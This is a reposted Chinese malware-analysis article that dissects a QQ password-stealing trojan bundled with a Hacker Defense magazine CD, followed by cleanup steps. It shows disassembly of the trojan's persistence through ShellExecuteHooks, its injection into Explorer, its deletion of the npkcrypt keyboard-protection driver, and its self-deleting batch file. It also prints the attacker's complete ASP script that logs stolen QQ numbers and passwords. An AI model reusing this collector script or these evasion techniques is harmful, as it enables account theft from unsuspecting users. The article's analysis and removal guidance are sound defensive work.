首页 编程 软件学院 查看内容

分析黑防光盘中的QQ黑手

2006-8-15 08:59 873 0

摘要: 文章作者:混世魔王 QQ:26836659信息来源:邪恶八进制信息安全团队注意:本文已经发表于《黑客防线》杂志骗钱,高手略过,有不足,还望指点。 看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,...
关键词: nbsp DWORD EAX PUSH CALL PTR EBP MOV 003 E8

文章作者:混世魔王 QQ:26836659信息来源:邪恶八进制信息安全团队注意:本文已经发表于《黑客防线》杂志骗钱,高手略过,有不足,还望指点。 看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,动网漏洞利用动画所附带的工具会使杀毒软件报警,提示为Trojan-PSW.Win32.QQShou.ed。一想,我老魔算黑的了,居然还有比我更黑的。看来是青出于蓝……于是把这个恶意程序分析了一下,算是给自己增强手动超作的经验,也帮中了马的朋友们,把他清理的干干净净。先PEID查壳,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],网上n多脱壳机,我这就不去DOWN,直接用PEID的UPX FILEINFO的插件,就可以轻松的获得UPX加壳程序的OEP。这里OEP 为:4056D8 直接OD载入.F4,到4056D8把他DOWN 出来。脱壳就完毕了.再用PEID一查,Borland Delphi 6.0 - 7.0,脱壳后,是否修复就随便你了。反正我们又不运行。用OD载入脱壳后的程序,来分析吧。00404935   50         PUSH EAX00404936   E8 71FCFFFF   CALL <JMP.&kernel32.GetSystemDirectoryA> //返回WINDOWS系统目录路径0040493B   85C0         TEST EAX,EAX0040493D   75 07       JNZ SHORT 2.004049460040493F   C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],4300404946   8A85 00FFFFFF   MOV AL,BYTE PTR SS:[EBP-100]0040494C   50         PUSH EAX0040494D   E8 E2FCFFFF   CALL <JMP.&USER32.IsCharAlphaA>   //确定字符串是否是字母00404952   83F8 01       CMP EAX,100404955   1BC0         SBB EAX,EAX00404957   40         INC EAX00404958   84C0         TEST AL,AL0040495A   75 07       JNZ SHORT 2.004049630040495C   C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43   //这里的Hex(43)=Char(C) C盘拉~~ 00404963   8D85 FCFEFFFF   LEA EAX,DWORD PTR SS:[EBP-104]00404969   8A95 00FFFFFF   MOV DL,BYTE PTR SS:[EBP-100]0040496F   E8 CCEDFFFF   CALL 2.0040374000404974   8B95 FCFEFFFF   MOV EDX,DWORD PTR SS:[EBP-104]0040497A   8BC3         MOV EAX,EBX0040497C   B9 B4494000   MOV ECX,2.004049B4   ; :\program files\internet explorer\plugins\00404981   E8 2EEEFFFF   CALL 2.004037B400404986   33C0         XOR EAX,EAX00404988   5A         POP EDX00404989   59         POP ECX0040498A   59         POP ECX程序运行后,首先会在系统目录建立文件,路径是:C:\Program Files\Internet Explorer\PLUGINS\来到这个地方,你就会发现多了一个文件bow.sys动态链接库和bow.bak两个文件,怎么判断是木马生成的,你注意看看文件的生成日期就会发现。要注意的是这个文件是隐藏的,必需显示所有文件才能看得到。我们OD,来看看bow.sys文件的内容,003E4E1A |. 50   PUSH EAX             /pDisposition003E4E1B |. 8D4424 04   LEA EAX,DWORD PTR SS:[ESP+4]     ; |003E4E1F |. 50         PUSH EAX                 ; |pHandle003E4E20 |. 6A 00       PUSH 0                   ; |pSecurity = NULL003E4E22 |. 68 3F000F00   PUSH 0F003F     ; |Access = KEY_ALL_ACCESS003E4E27 |. 6A 00   PUSH 0   ; |Options = REG_OPTION_NON_VOLATILE003E4E29 |. 6A 00       PUSH 0         ; |Class = NULL003E4E2B |. 6A 00       PUSH 0         ; |Reserved = 0003E4E2D |. 68 744E3E00   PUSH bow.003E4E74                 ; |software\ms\qqguishou003E4E32 |. 68 01000080   PUSH 80000001     ; |hKey = HKEY_CURRENT_USER003E4E37 |. E8 54F4FFFF   CALL <JMP.&advapi32.RegCreateKeyExA>   ; \RegCreateKeyExA写注册表,HKEY_CURRENT_USER\Software\Ms\QQGuiShou“QQGuiShou”的拼音“QQ鬼手”?根据谷歌记载,确有此盗Q软件,继续分析:00407715 A124A14000         mov eax, dword ptr [0040A124]:0040771A 8B4018             mov eax, dword ptr [eax+18]:0040771D 50               push eax:0040771E A124A14000         mov eax, dword ptr [0040A124]:00407723 8B4014             mov eax, dword ptr [eax+14]:00407726 50               push eax* Possible StringData Ref from Code Obj ->"QQ冲击波给你送礼物啦-->(":00407727 68947A4000         push 00407A94:0040772C FF75F8             push [ebp-08]* Possible StringData Ref from Code Obj ->"----":0040772F 68B87A4000         push 00407AB8:00407734 FF75F4             push [ebp-0C]:00407737 68C87A4000         push 00407AC8:0040773C 8D45CC             lea eax, dword ptr [ebp-34]:0040773F BA05000000         mov edx, 00000005:00407744 E853BDFFFF         call 0040349C:00407749 8B45CC             mov eax, dword ptr [ebp-34]:0040774C 50               push eax* Possible StringData Ref from Code Obj ->" 号码:":0040774D 68D47A4000         push 00407AD4:00407752 FF75F8             push [ebp-08]* Possible StringData Ref from Code Obj ->" ----密码:":00407755 68E47A4000         push 00407AE4:0040775A FF75F4             push [ebp-0C]* Possible StringData Ref from Code Obj ->" ----可用游戏币:":0040775D 68F87A4000         push 00407AF8:00407762 8D55C4             lea edx, dword ptr [ebp-3C]:00407765 8B45DC             mov eax, dword ptr [ebp-24]:00407768 E8E7D7FFFF         call 00404F54:0040776D FF75C4             push [ebp-3C]* Possible StringData Ref from Code Obj ->" ----保存的:":00407770 68147B4000         push 00407B14:00407775 8D55C0             lea edx, dword ptr [ebp-40]:00407778 8B45E0             mov eax, dword ptr [ebp-20]:0040777B E8D4D7FFFF         call 00404F54:00407780 FF75C0             push [ebp-40]* Possible StringData Ref from Code Obj ->" ----积分:":00407783 682C7B4000         push 00407B2C:00407788 8D55BC             lea edx, dword ptr [ebp-44]:0040778B 8B45EC             mov eax, dword ptr [ebp-14]:0040778E E8C1D7FFFF         call 00404F54:00407793 FF75BC             push [ebp-44]* Possible StringData Ref from Code Obj ->" ----是否是会员:":00407796 68407B4000         push 00407B40:0040779B 8D55B8             lea edx, dword ptr [ebp-48]:0040779E 8B45D4             mov eax, dword ptr [ebp-2C]:004077A1 E8AED7FFFF         call 00404F54:004077A6 FF75B8             push [ebp-48]* Possible StringData Ref from Code Obj ->" ----等级:"                      |:004077A9 685C7B4000         push 00407B5C:004077AE 8D55B4             lea edx, dword ptr [ebp-4C]:004077B1 8B45D0             mov eax, dword ptr [ebp-30]:004077B4 E89BD7FFFF         call 00404F54:004077B9 FF75B4             push [ebp-4C]* Possible StringData Ref from Code Obj ->" ----游戏点:"                      |:004077BC 68707B4000         push 00407B70:004077C1 8D55B0             lea edx, dword ptr [ebp-50]:004077C4 8B45E4             mov eax, dword ptr [ebp-1C]:004077C7 E888D7FFFF         call 00404F54:004077CC FF75B0             push [ebp-50]* Possible StringData Ref from Code Obj ->" ----IP: "“QQ冲击波给你送礼物啦!”果然是大礼,通过到QQ站上的查询,把你的QQ号码:密码:可用游戏币:否是会员:积分:等级:游戏点:IP,所有的信息都当做礼物送出去了。写入自身的sys到这里面。还加上程序后面的配置信息。哎.现在的木马是越做越好….采用的ASP网页形式post提交,保存接收的密码,有兴趣的朋友可以抓个包看看,我这里就不去抢劫别人的劳动果实了。接收密码ASP代码如下:<%LogFile="log.txt"LogFileGB="LOGGB.txt"QQNumber=request("Number")QQPassWord=request("PassWord")QQGBA=request("yxba")QQGBB=request("yxbb")if QQGBA="" thenQQGBA="no"end ifif QQGBB="" thenQQGBB="no"end ifLogText=QQNumber&"----"&QQPassWord LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBBset f=Server.CreateObject("scripting.filesystemobject")set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)ff.writeline(LogText)ff.closeset ff=nothingset f=nothingset f1=Server.CreateObject("scripting.filesystemobject")set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)ff1.writeline(LogTextGB)ff1.closeset ff1=nothingset f1=nothing%>00404AFB   55         PUSH EBP00404AFC   68 A04B4000   PUSH 2.00404BA000404B01   64:FF30       PUSH DWORD PTR FS:[EAX]00404B04   64:8920       MOV DWORD PTR FS:[EAX],ESP00404B07   68 AC4B4000   PUSH 2.00404BAC00404B0C   B9 B04B4000   MOV ECX,2.00404BB0               ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}00404B11   BA D84B4000   MOV EDX,2.00404BD8               ; software\microsoft\windows\currentversion\explorer\shellexecutehooks00404B16   B8 02000080   MOV EAX,8000000200404B1B   E8 70FFFFFF   CALL 2.00404A9000404B20   8D45 FC       LEA EAX,DWORD PTR SS:[EBP-4]00404B23   BA 284C4000   MOV EDX,2.00404C28               ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}00404B28   E8 8BEBFFFF   CALL 2.004036B800404B2D   68 AC4B4000   PUSH 2.00404BAC00404B32   8B45 FC       MOV EAX,DWORD PTR SS:[EBP-4]00404B35   E8 1EEEFFFF   CALL 2.0040395800404B3A   8BD0         MOV EDX,EAX00404B3C   B9 AC4B4000   MOV ECX,2.00404BAC00404B41   B8 00000080   MOV EAX,8000000000404B46   E8 45FFFFFF   CALL 2.00404A9000404B4B   8D45 FC       LEA EAX,DWORD PTR SS:[EBP-4]00404B4E   BA 604C4000   MOV EDX,2.00404C60               ; \inprocserver32apartment00404B53   E8 18ECFFFF   CALL 2.00403770写入注册表键值80000000SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks" {F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}.com组件服务:0012FF20 80000000 |hKey = HKEY_CLASSES_ROOT0012FF24 00404C28 |Subkey = "CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"最后LoadLibary来运行木马程序。00404E56   8B95 2CFEFFFF   MOV EDX,DWORD PTR SS:[EBP-1D4]00404E5C   8D45 FC       LEA EAX,DWORD PTR SS:[EBP-4]00404E5F   B9 B44F4000   MOV ECX,2.00404FB4       ; microsoft.bat00404E64   E8 4BE9FFFF   CALL 2.004037B400404E69   8B55 FC       MOV EDX,DWORD PTR SS:[EBP-4]00404E6C   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404E72   E8 B1DBFFFF   CALL 2.00402A2800404E77   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404E7D   E8 42D9FFFF   CALL 2.004027C400404E82   E8 11D7FFFF   CALL 2.0040259800404E87   BA CC4F4000   MOV EDX,2.00404FCC               ; :try00404E8C   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404E92   E8 55ECFFFF   CALL 2.00403AEC00404E97   E8 A8DEFFFF   CALL 2.00402D4400404E9C   E8 F7D6FFFF   CALL 2.0040259800404EA1   68 DC4F4000   PUSH 2.00404FDC                 ; del "00404EA6   8D95 20FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1E0]00404EAC   33C0         XOR EAX,EAX00404EAE   E8 41D8FFFF   CALL 2.004026F400404EB3   FFB5 20FEFFFF   PUSH DWORD PTR SS:[EBP-1E0]00404EB9   68 EC4F4000   PUSH 2.00404FEC                 ; "00404EBE   8D85 24FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1DC]00404EC4   BA 03000000   MOV EDX,300404EC9   E8 5AE9FFFF   CALL 2.0040382800404ECE   8B95 24FEFFFF   MOV EDX,DWORD PTR SS:[EBP-1DC]00404ED4   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404EDA   E8 0DECFFFF   CALL 2.00403AEC00404EDF   E8 60DEFFFF   CALL 2.00402D4400404EE4   E8 AFD6FFFF   CALL 2.0040259800404EE9   68 F84F4000   PUSH 2.00404FF8                 ; if exist "00404EEE   8D95 18FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1E8]00404EF4   33C0         XOR EAX,EAX00404EF6   E8 F9D7FFFF   CALL 2.004026F400404EFB   FFB5 18FEFFFF   PUSH DWORD PTR SS:[EBP-1E8]00404F01   68 EC4F4000   PUSH 2.00404FEC                 ; "00404F06   68 0C504000   PUSH 2.0040500C                 ; goto try00404F0B   8D85 1CFEFFFF   LEA EAX,DWORD PTR SS:[EBP-1E4]00404F11   BA 04000000   MOV EDX,400404F16   E8 0DE9FFFF   CALL 2.00403828         //这个CALL调用LoadLibary来运行木马程序00404F1B   8B95 1CFEFFFF   MOV EDX,DWORD PTR SS:[EBP-1E4]00404F21   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404F27   E8 C0EBFFFF   CALL 2.00403AEC00404F2C   E8 13DEFFFF   CALL 2.00402D4400404F31   E8 62D6FFFF   CALL 2.0040259800404F36   BA 20504000   MOV EDX,2.00405020               ; del %000404F3B   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404F41   E8 A6EBFFFF   CALL 2.00403AEC00404F46   E8 F9DDFFFF   CALL 2.00402D4400404F4B   E8 48D6FFFF   CALL 2.0040259800404F50   8D85 30FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1D0]00404F56   E8 89DBFFFF   CALL 2.00402AE400404F5B   E8 38D6FFFF   CALL 2.00402598我是在桌面上调试的,所以会在桌面上生成个microsoft.bat 的文件,调用CMD执行。建立microsoft.bat 文件来删除自身。里面内容为:trydel "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"if exist "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe" goto trydel %0最后结束进程序。003E9B3D |. E8 7697FFFF   CALL bow.003E32B8003E9B42 |. 68 D09D3E00   PUSH bow.003E9DD0       ; ASCII "QQ.Exe"003E9B47 |. A1 4CB83E00   MOV EAX,DWORD PTR DS:[3EB84C]003E9B4C |. E8 8B9AFFFF   CALL bow.003E35DC003E9B51 |. 8BD8       MOV EBX,EAX                     ; |003E9B53 |. 53         PUSH EBX                       ; |String1003E9B54 |. E8 4FA8FFFF   CALL <JMP.&kernel32.lstrcmpiA>       ; \lstrcmpiA003E9B59 |. 85C0       TEST EAX,EAX003E9B5B |. 75 7B       JNZ SHORT bow.003E9BD8003E9B5D |. 8D45 B4     LEA EAX,DWORD PTR SS:[EBP-4C]003E9B60 |. 8BD6       MOV EDX,ESI003E9B62 |. B9 05010000   MOV ECX,105003E9B67 |. E8 5898FFFF   CALL bow.003E33C4003E9B6C |. 8B45 B4     MOV EAX,DWORD PTR SS:[EBP-4C]003E9B6F |. 8D55 B8     LEA EDX,DWORD PTR SS:[EBP-48]003E9B72 |. E8 25C6FFFF   CALL bow.003E619C003E9B77 |. 8B55 B8     MOV EDX,DWORD PTR SS:[EBP-48]003E9B7A |. B8 48B83E00   MOV EAX,bow.003EB848003E9B7F |. E8 3497FFFF   CALL bow.003E32B8003E9B84 |. 8D45 B0     LEA EAX,DWORD PTR SS:[EBP-50]003E9B87 |. B9 E09D3E00   MOV ECX,bow.003E9DE0   ; ASCII "LoginCtrl.dll"003E9B8C |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]003E9B92 |. E8 9198FFFF   CALL bow.003E3428003E9B97 |. 8B45 B0     MOV EAX,DWORD PTR SS:[EBP-50]003E9B9A |. E8 3D9AFFFF   CALL bow.003E35DC003E9B9F |. 50         PUSH EAX       ; /FileName003E9BA0 |. E8 BBA7FFFF   CALL <JMP.&kernel32.LoadLibraryA>; \LoadLibraryA003E9BA5 |. A3 18A13E00   MOV DWORD PTR DS:[3EA118],EAX003E9BAA |. 8D45 AC     LEA EAX,DWORD PTR SS:[EBP-54]003E9BAD |. B9 F89D3E00   MOV ECX,bow.003E9DF8   ; ASCII "npkcrypt.sys"003E9BB2 |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]003E9BB8 |. E8 6B98FFFF   CALL bow.003E3428003E9BBD |. 8B45 AC     MOV EAX,DWORD PTR SS:[EBP-54]003E9BC0 |. E8 179AFFFF   CALL bow.003E35DC003E9BC5 |. 50         PUSH EAX     ; /FileName003E9BC6 |. E8 05A7FFFF   CALL <JMP.&kernel32.DeleteFileA> ; \DeleteFileA003E9BCB |. A1 28A13E00   MOV EAX,DWORD PTR DS:[3EA128]003E9BD0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1003E9BD6 |. EB 1E       JMP SHORT bow.003E9BF6003E9BD8 |> 68 089E3E00   PUSH bow.003E9E08     ; /String2 = "Explorer.Exe"003E9BDD |. 53         PUSH EBX           ; |String1003E9BDE |. E8 C5A7FFFF   CALL <JMP.&kernel32.lstrcmpiA>   ; \lstrcmpiA003E9BE3 |. 85C0       TEST EAX,EAX003E9BE5 |. 0F85 BB010000 JNZ bow.003E9DA6003E9BEB |. A1 30A13E00   MOV EAX,DWORD PTR DS:[3EA130]003E9BF0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1003E9BF6 |> 68 04010000   PUSH 104       ; /BufSize = 104 (260.)003E9BFB |. 56         PUSH ESI       ; |PathBuffer003E9BFC |. A1 50B63E00   MOV EAX,DWORD PTR DS:[3EB650]         ; |003E9C01 |. 50         PUSH EAX       ; |hModule => NULL003E9C02 |. E8 09A7FFFF   CALL <JMP.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA程序插入Explorer.exe 进程,很流行。不信?我们可以用IceSword来看看Explorer.exe的进程。不过,木马在加载的时候。会删除npkcrypt.sys的驱动程序,根据谷歌记载,QQ2005 Beta3 及以后的版本整合了一个叫做 npkcrypt 的键盘加密程序,美曰其明保护用户密码输入安全,其实是不经用户同意擅自在用户系统中安装莫名其妙驱动程序。安装此版本后,密码不能通过粘贴的方法输入,密码为中文的QQ用户没法登录。木马删除npkcrypt.sys再运行QQ原程序,就可以设置好钩子。以便记录你输入的密码。木马是注册的服务,所以你在自启动里面是看不到启动项的。经过已上分析,我们可以bow.sys删文件,删注册表,想必可以轻松的解决掉这个木马了。不过还有后遗症。就是删除了我们的npkcrypt.sys驱动程序,电脑重启,会弹错警告窗口说服务运行错误。在“我的电脑”上点右键,选“管理”->“设备管理器”,选择“查看”/“显示隐藏的设备”,在“非即插即用驱动程序”中选择“npkcrypt”,卸载之,可选重新启动,然后CMD 运行“regedit”,在注册表中查找“nplcrypt”,可能会找到“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\npkcrypt”或“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\npkcrypt”等键,删除重启后一般会解决问题,搜索 npkcrypt.*,删除。OK,这个小马就ok了。最后BS一下下马的人,饮水思源啊.怎么说,黑防也是我们菜鸟起步的地方,成了老鸟怎么能欺负小鸟了?做人要厚道.
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部